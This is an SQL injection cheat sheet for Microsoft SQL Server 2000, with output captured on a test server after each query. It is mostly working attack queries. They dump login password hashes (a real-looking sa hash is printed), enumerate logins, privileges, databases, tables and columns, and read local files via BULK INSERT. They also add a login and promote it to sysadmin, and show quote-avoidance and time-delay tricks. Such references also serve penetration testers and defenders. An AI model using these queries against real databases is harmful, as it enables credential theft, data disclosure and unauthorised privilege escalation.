MSSQL 2000 SP4 SQL injection cheat sheet (each query is followed by the output captured on the test server)

Version:

SELECT @@version;


Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Enterprise Evaluation Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


(所影响的行数为 1 行)

Comments:

SELECT 1 --comment;

1

(所影响的行数为 1 行)

SELECT /*comment*/1;

1

(所影响的行数为 1 行)

Current User:

SELECT user_name();

dbo

(所影响的行数为 1 行)

SELECT system_user;

YANG-C16322B843\Administrator

(所影响的行数为 1 行)

SELECT user;

dbo

(所影响的行数为 1 行)

SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID;

loginame                                                                                                                         
-------------------------------------------------------------------------------------------------------------------------------- 
YANG-C16322B843\Administrator                                                                                                   

(所影响的行数为 1 行)

List Users (the query that produced this output was not recorded; only the result set follows):

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
sa
BUILTIN\Administrators

(所影响的行数为 2 行)

List Password Hashes:

SELECT name, password FROM master..sysxlogins;

name                                                                                                                             password                                                                                                                                                                                                                                                           
-------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ 
BUILTIN\Administrators                                                                                                           NULL
sa                                                                                                                               0x01008857077DB8818A4AF0ECF49EDA773D7C136CEB10769829D1478CAC0BE3631231BA55BD40D38AFD5E7E4F608B
NULL                                                                                                                             NULL

(所影响的行数为 3 行)

SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins;

name                                                                                                                                                                                                                                                                                                                                                                                              
-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 
BUILTIN\Administrators                                                                                                           NULL
sa                                                                                                                               0x01008857077db8818a4af0ecf49eda773d7c136ceb10769829d1478cac0be3631231ba55bd40d38afd5e7e4f608b
NULL                                                                                                                             NULL

(所影响的行数为 3 行)

List Privileges:

SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('dbcreator');
SELECT is_srvrolemember('bulkadmin');
SELECT is_srvrolemember('diskadmin');
SELECT is_srvrolemember('processadmin');
SELECT is_srvrolemember('serveradmin');
SELECT is_srvrolemember('setupadmin');
SELECT is_srvrolemember('securityadmin');

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

            
----------- 
1

(所影响的行数为 1 行)

SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
BUILTIN\Administrators
sa

(所影响的行数为 2 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
BUILTIN\Administrators
sa

(所影响的行数为 2 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
sa

(所影响的行数为 1 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
sa

(所影响的行数为 1 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
BUILTIN\Administrators
sa

(所影响的行数为 2 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 

(所影响的行数为 0 行)

Current Database:

SELECT DB_NAME();


                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
master

(所影响的行数为 1 行)

List Databases:

SELECT name FROM master..sysdatabases;

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
master
tempdb
model
msdb
pubs
Northwind
yang

(所影响的行数为 7 行)

SELECT DB_NAME(0); 
SELECT DB_NAME(1); 
SELECT DB_NAME(2); 
SELECT DB_NAME(3); 
SELECT DB_NAME(4); 
SELECT DB_NAME(5); 
SELECT DB_NAME(6); 
SELECT DB_NAME(7); 
SELECT DB_NAME(8); 

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
master

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
master

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
tempdb

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
model

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
msdb

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
pubs

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
Northwind

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
yang

(所影响的行数为 1 行)

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
NULL

(所影响的行数为 1 行)

List Columns:

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tb_user'); 

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
password
username

(所影响的行数为 2 行)

SELECT yang..syscolumns.name, TYPE_NAME(yang..syscolumns.xtype) FROM yang..syscolumns, yang..sysobjects WHERE yang..syscolumns.id=yang..sysobjects.id AND yang..sysobjects.name='tb_user';

name                                                                                                                                                                                                                                                              
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- 
username                                                                                                                         varchar
password                                                                                                                         varchar

(所影响的行数为 2 行)

List Tables:

SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM yang..sysobjects WHERE xtype = 'U';

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
spt_monitor
spt_values
spt_fallback_db
spt_fallback_dev
spt_fallback_usg
spt_provider_types
spt_datatype_info_ext
MSreplication_options
spt_datatype_info
spt_server_info

(所影响的行数为 10 行)

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
tb_user
dtproperties

(所影响的行数为 2 行)

Find Tables From Column Name:

SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name = 'username';

tablename                                                                                                                        columnname                                                                                                                       
-------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- 
tb_user                                                                                                                          username

(所影响的行数为 1 行)

Select Nth Row (inner TOP N ascending, outer TOP 1 descending; here N=9 but the server has only two logins, so the last one, 'sa', is returned):

SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC;

name                                                                                                                             
-------------------------------------------------------------------------------------------------------------------------------- 
sa

(所影响的行数为 1 行)

Select Nth Char:

SELECT substring('abcd', 3, 1);

     
---- 
c

(所影响的行数为 1 行)

Bitwise AND:

SELECT 6 & 2;
SELECT 6 & 1;

            
----------- 
2

(所影响的行数为 1 行)

            
----------- 
0

(所影响的行数为 1 行)

ASCII Value -> Char:

SELECT char(0x41);

     
---- 
A

(所影响的行数为 1 行)

Char -> ASCII Value:

SELECT ascii('A');

            
----------- 
65

(所影响的行数为 1 行)

Casting:

SELECT CAST('1' as int);
SELECT CAST(1 as char);

            
----------- 
1

(所影响的行数为 1 行)

                               
------------------------------ 
1                             

(所影响的行数为 1 行)

String Concatenation:

SELECT 'A' + 'B';

     
---- 
AB

(所影响的行数为 1 行)

If Statement:

IF (1=1) SELECT 1 ELSE SELECT 2;

            
----------- 
1

(所影响的行数为 1 行)

Case Statement:

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END;

            
----------- 
1

(所影响的行数为 1 行)

Avoiding Quotes:

SELECT char(65)+char(66);

     
---- 
AB

(所影响的行数为 1 行)

Time Delay:

WAITFOR DELAY '0:0:5';

Local File Access (note: the helper table `mydata` is created in the current database and is never dropped in this transcript, so it persists as an artifact):

CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\\boot.ini';
SELECT * FROM mydata;

(所影响的行数为 5 行)

line                                                                                                                                                                                                                                                             
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect

(所影响的行数为 5 行)

Hostname, IP Address:

SELECT HOST_NAME();

                                                                                                                                 
-------------------------------------------------------------------------------------------------------------------------------- 
YANG-C16322B843

(所影响的行数为 1 行)

Create Users:

EXEC sp_addlogin 'user', 'pass'; 

已创建新登录。

Make User DBA:

EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; 

'user' 已添加到角色 'sysadmin' 中。

Drop Users:

EXEC sp_droplogin 'user'; 

登录已除去。

Location of DB files:

EXEC sp_helpdb master;
EXEC sp_helpdb pubs;

name                                                                                                                             db_size       owner                                                                                                                            dbid   created     status                                                                                                                                                                                                                                                           compatibility_level 
-------------------------------------------------------------------------------------------------------------------------------- ------------- -------------------------------------------------------------------------------------------------------------------------------- ------ ----------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------- 
master                                                                                                                                22.00 MB sa                                                                                                                               1      08  6 2000  Status=ONLINE, Updateability=READ_WRITE, UserAccess=MULTI_USER, Recovery=SIMPLE, Version=539, Collation=Chinese_PRC_CI_AS, SQLSortOrder=0, IsTornPageDetectionEnabled, IsAutoCreateStatistics, IsAutoUpdateStatistics                                            80

 
name                                                                                                                             fileid filename                                                                                                                                                                                                                                                         filegroup                                                                                                                        size               maxsize            growth             usage     
-------------------------------------------------------------------------------------------------------------------------------- ------ ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ------------------ ------------------ ------------------ --------- 
master                                                                                                                           1      C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf                                                                                                                                                                                                      PRIMARY                                                                                                                          17344 KB           Unlimited          10%                data only
mastlog                                                                                                                          2      C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf                                                                                                                                                                                                     NULL                                                                                                                             5184 KB            Unlimited          10%                log only

name                                                                                                                             db_size       owner                                                                                                                            dbid   created     status                                                                                                                                                                                                                                                           compatibility_level 
-------------------------------------------------------------------------------------------------------------------------------- ------------- -------------------------------------------------------------------------------------------------------------------------------- ------ ----------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------- 
pubs                                                                                                                                   2.50 MB sa                                                                                                                               5      08  6 2000  Status=ONLINE, Updateability=READ_WRITE, UserAccess=MULTI_USER, Recovery=SIMPLE, Version=539, Collation=Chinese_PRC_CI_AS, SQLSortOrder=0, IsTornPageDetectionEnabled, IsAutoCreateStatistics, IsAutoUpdateStatistics                                            80

 
name                                                                                                                             fileid filename                                                                                                                                                                                                                                                         filegroup                                                                                                                        size               maxsize            growth             usage     
-------------------------------------------------------------------------------------------------------------------------------- ------ ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ------------------ ------------------ ------------------ --------- 
pubs                                                                                                                             1      C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf                                                                                                                                                                                                        PRIMARY                                                                                                                          1792 KB            Unlimited          10%                data only
pubs_log                                                                                                                         2      C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs_log.ldf                                                                                                                                                                                                    NULL                                                                                                                             768 KB             Unlimited          10%                log only

